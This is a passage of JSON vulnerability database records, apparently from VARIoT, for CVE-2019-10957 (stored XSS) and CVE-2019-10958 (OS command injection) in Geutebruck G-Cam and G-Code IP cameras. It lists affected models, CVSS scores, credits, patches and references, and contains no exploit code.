            "model": "g-cam/efd-2241",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2250",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC., and Davy Douhine from RandoriSec, and Davy Douhine from RandoriSec., and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-10957",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2019-10957",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2020-22347",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2019-10957",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2019-10957",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-10957",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-10957",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22347",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-090",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-10957",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user\u2019s browser. Geutebruck IP Camera G-Code and G-Cam Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have cross-site scripting vulnerabilities. The vulnerability stems from the lack of proper verification of client data by WEB applications. Attackers can use this vulnerability to execute client code. Geutebruck G-Cam and G-Code are prone to an HTML-injection vulnerability and multiple OS command-injection vulnerabilities. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-10957",
            "trust": 4.2
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-19-155-03",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108579",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "id": "VAR-202001-1488",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          }
        ],
        "trust": 1.5020833375
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          }
        ]
      },
      "last_update_date": "2024-12-28T22:51:07.576000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "title": "Patch for Geutebr\u00fcck G-Cam and G-Code cross-site scripting vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/213551"
          },
          {
            "title": "Multiple Geutebr\u00fcck Fixes for product cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93179"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": " Cross-site scripting (CWE-79) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.6,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10957"
          },
          {
            "trust": 0.9,
            "url": "https://www.geutebrueck.com/en_en.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.securityfocus.com/bid/108579"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162091"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "date": "2020-01-17T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "date": "2019-06-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "date": "2020-01-17T18:15:12.180000",
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "date": "2020-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2024-12-27T03:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "date": "2020-02-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "date": "2024-11-21T04:20:13.960000",
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck\u00a0IP\u00a0Camera\u00a0G-Code\u00a0 and \u00a0G-Cam\u00a0 Cross-site scripting vulnerability in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1489

    Vulnerability from variot - Updated: 2024-12-28 22:51

    Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to network configuration to supply system commands to the server, leading to remote code execution as root. Geutebruck IP Camera G-Code and G-Cam for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.

    Geutebrück G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior G-Cam EBC-21xx version 1.12.0.25 and prior G-Cam EFD-22xx version 1.12.0.25 and prior G-Cam ETHC-22xx version 1.12.0.25 and prior G-Cam EWPC-22xx version 1.12.0.25 and prior

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1489",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code/eec-2400",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2241",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2250",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC., and Davy Douhine from RandoriSec, and Davy Douhine from RandoriSec.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-10958",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2019-10958",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-22345",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2019-10958",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-10958",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-10958",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-10958",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22345",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-087",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
